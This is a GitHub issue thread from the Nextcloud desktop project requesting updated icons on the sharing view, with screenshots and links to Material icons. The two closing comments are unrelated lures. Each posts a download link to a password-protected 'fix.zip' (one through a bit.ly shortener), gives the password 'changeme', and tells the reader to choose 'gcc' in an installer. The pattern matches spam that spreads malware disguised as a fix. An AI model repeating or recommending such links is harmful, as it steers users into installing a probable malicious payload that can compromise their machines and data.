### ISSUE TITLE
[Style] Update icons on sharing view 

### ISSUE THREAD

**Issue by AndyScherzinger** [nextcloud/desktop#7039]
### How to use GitHub

|Desktop|Web v30|
|---|---|
|<img width="339" alt="2024-08-27 17_17_33-NVIDIA GeForce Overlay" src="https://github.com/user-attachments/assets/cdbbf181-8958-4f78-9900-951a31612d98">|<img width="380" alt="2024-08-27 17_31_50-NVIDIA GeForce Overlay" src="https://github.com/user-attachments/assets/89c86196-b284-4ab8-b029-97523143f428">|

updated icons for:
* [link share](https://fonts.google.com/icons?icon.query=link&selected=Material+Symbols+Outlined:link:FILL@0;wght@400;GRAD@0;opsz@24&icon.size=24&icon.color=%23e8eaed)
* [external link](https://fonts.google.com/icons?icon.query=link&selected=Material+Symbols+Outlined:link:FILL@0;wght@400;GRAD@0;opsz@24&icon.size=24&icon.color=%23e8eaed)
* [copy icon](https://fonts.google.com/icons?icon.query=copy&selected=Material+Icons+Outlined:content_copy:&icon.size=24&icon.color=%23e8eaed&icon.set=Material+Icons)

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
